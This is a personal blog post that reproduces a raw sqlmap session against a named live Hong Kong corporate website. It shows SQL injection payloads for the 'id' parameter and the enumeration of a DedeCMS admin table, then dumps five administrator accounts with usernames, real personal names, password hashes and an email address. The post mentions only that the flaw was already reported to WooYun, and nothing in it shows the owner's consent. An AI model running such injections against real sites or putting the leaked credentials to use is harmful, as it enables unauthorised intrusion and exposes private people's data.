root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_admin -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:01:02

[21:01:02] [INFO] resuming back-end DBMS 'mysql' 
[21:01:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:01:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:01:02] [INFO] fetching columns for table 'dede_admin' in database 'xinhuapinmei'
[21:01:03] [WARNING] reflective value(s) found and filtering out
[21:01:03] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:01:03] [WARNING] the SQL query provided does not return any output
[21:01:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:01:03] [WARNING] unable to retrieve column names for table 'dede_admin' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] y
[21:01:05] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[21:01:05] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 
[21:01:06] [WARNING] running in a single-thread mode. This could take a while.
[21:01:06] [INFO] retrieved: id                                                
[21:01:08] [INFO] retrieved: userid                                            
[21:01:13] [INFO] retrieved: email                                             
[21:01:19] [INFO] tried 39/2496 items (2%)
[21:01:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:05:11] [INFO] retrieved: pwd                                               
[21:05:43] [INFO] retrieved: uname                                             
[21:05:45] [INFO] tried 610/2496 items (24%)
[21:06:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:07:51] [INFO] tried 872/2496 items (35%)^C

[21:07:52] [WARNING] user aborted during column existence check. sqlmap will display partial output
                                                                               
Database: xinhuapinmei
Table: dede_admin
[5 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| email  | non-numeric |
| id     | numeric     |
| pwd    | non-numeric |
| uname  | non-numeric |
| userid | non-numeric |
+--------+-------------+

[21:07:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:07:54

root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dump -T dede_admin -C "uname,pwd" -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:08:21

[21:08:21] [INFO] resuming back-end DBMS 'mysql' 
[21:08:21] [INFO] testing connection to the target URL
[21:08:52] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:08:52] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:08:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:08:53] [INFO] fetching columns 'pwd, uname' for table 'dede_admin' in database 'xinhuapinmei'
[21:08:54] [WARNING] reflective value(s) found and filtering out
[21:08:54] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:08:54] [WARNING] the SQL query provided does not return any output
[21:08:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:08:54] [WARNING] unable to retrieve column names for table 'dede_admin' in database 'xinhuapinmei'
[21:08:54] [INFO] fetching entries of column(s) 'email, id, pwd, uname, userid' for table 'dede_admin' in database 'xinhuapinmei'
[21:08:55] [WARNING] the SQL query provided does not return any output
[21:08:55] [INFO] fetching number of column(s) 'email, id, pwd, uname, userid' entries for table 'dede_admin' in database 'xinhuapinmei'
[21:08:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:08:55] [INFO] retrieved: 5
[21:08:57] [INFO] retrieved: 
[21:08:59] [WARNING] time-based comparison requires larger statistical model, please wait............
[21:09:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[21:10:33] [INFO] adjusting time delay to 2 seconds due to good response times
[21:10:33] [ERROR] invalid character detected. retrying..
[21:10:33] [WARNING] increasing time delay to 3 seconds 
[21:10:45] [ERROR] invalid character detected. retrying..
[21:10:45] [WARNING] increasing time delay to 4 seconds 

[21:10:56] [ERROR] invalid character detected. retrying..
[21:10:56] [WARNING] increasing time delay to 5 seconds 
[21:11:09] [ERROR] invalid character detected. retrying..
[21:11:09] [WARNING] increasing time delay to 6 seconds 

[21:11:11] [INFO] retrieved: 1
[21:11:16] [INFO] retrieved: 31a2819
[21:12:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
8c541f3c9f0f8
[21:12:44] [INFO] retrieved: admin
[21:12:59] [INFO] retrieved: admin
[21:13:20] [INFO] retrieved: 
[21:13:22] [INFO] retrieved: 
[21:13:24] [INFO] retrieved: 2
[21:13:30] [INFO] retrieved: 66f8880a7
[21:14:24] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
7d1077fe505
[21:14:56] [INFO] retrieved: 汤蕾
[21:16:12] [INFO] retrieved: tanglei
[21:16:32] [INFO] retrieved: 
[21:16:34] [INFO] retrieved: A
[21:17:22] [INFO] retrieved: 3
[21:17:26] [INFO] retrieved: 66f8880a77d1077fe505
[21:18:28] [INFO] retrieved: 钱晓乐
[21:20:25] [INFO] retrieved: qianxiaole
[21:20:52] [INFO] retrieved: 
[21:20:54] [INFO] retrieved: 
[21:20:57] [INFO] retrieved: 4
[21:21:01] [INFO] retrieved: 66f888
[21:21:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
0a77d1077fe505
[21:22:24] [INFO] retrieved: 刘惠
[21:24:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
迪
[21:24:41] [INFO] retrieved: liuhuidi
[21:25:10] [INFO] retrieved: liuyichi@gmail.com
[21:25:57] [INFO] retrieved: 5
[21:26:02] [INFO] retrieved: c2713e3c413414e38390
[21:26:51] [INFO] retrieved: 张科
[21:28:03] [INFO] retrieved: zhangke
[21:28:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[21:28:53] [INFO] analyzing table dump for possible password hashes
Database: xinhuapinmei
Table: dede_admin
[5 entries]
+----+------------+----------------------+-------+--------------------+
| id | userid     | pwd                  | uname | email              |
+----+------------+----------------------+-------+--------------------+
| 1  | admin      | 31a28198c541f3c9f0f8 | admin | <blank>            |
| 2  | tanglei    | 66f8880a77d1077fe505 | 汤蕾    | <blank>            |
| 3  | qianxiaole | 66f8880a77d1077fe505 | 钱晓乐   | A                  |
| 4  | liuhuidi   | 66f8880a77d1077fe505 | 刘惠迪   | <blank>            |
| 5  | zhangke    | c2713e3c413414e38390 | 张科    | liuyichi@gmail.com |
+----+------------+----------------------+-------+--------------------+

[21:28:53] [INFO] table 'xinhuapinmei.dede_admin' dumped to CSV file '/usr/share/sqlmap/output/www.digitalchina.com.hk/dump/xinhuapinmei/dede_admin.csv'
[21:28:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:28:53

root@root:~# 

Nothing more to say about it; the WooYun review dog said it has already been reported.

Copyright notice: unless otherwise noted, this article is an original work by w0ai1uo; please keep the source link when reposting.

Permalink: Digital China test notes - https://www.w0ai1uo.org/121.html
